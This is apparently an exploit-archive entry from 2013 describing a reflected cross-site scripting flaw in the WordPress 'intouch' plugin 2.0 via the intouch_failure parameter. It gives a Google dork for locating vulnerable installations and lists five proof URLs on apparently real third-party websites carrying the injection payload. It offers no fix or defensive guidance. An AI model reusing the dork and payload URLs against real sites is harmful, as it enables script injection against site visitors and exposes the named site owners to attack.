###################### # Exploit Title : Wordpress intouch Cross Site Scripting Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/intouch/ # Google Dork : inurl:/wp-content/plugins/intouch/ # Date : 2013/01/01 # Tested on : Windows 8 , Linux # Version : 2.0 # Software Link : http://downloads.wordpress.org/plugin/intouch.zip ###################### # Exploit : Cross Site Scripting # Location : http://[Target]/wp-content/plugins/intouch/intouch.js.php?intouch_failure=[XSS] # # Proof: # http://tresx4.net/esp/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/> # # http://www.maltagop.net/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/> # # http://www.sercongal.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/> # # http://www.day-trading-mind.com/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/> # # http://www.tauntoneasterrun.co.uk/wp-content/plugins/intouch/intouch.js.php?intouch_failure="/> ###################### # discovered by : Spoof ######################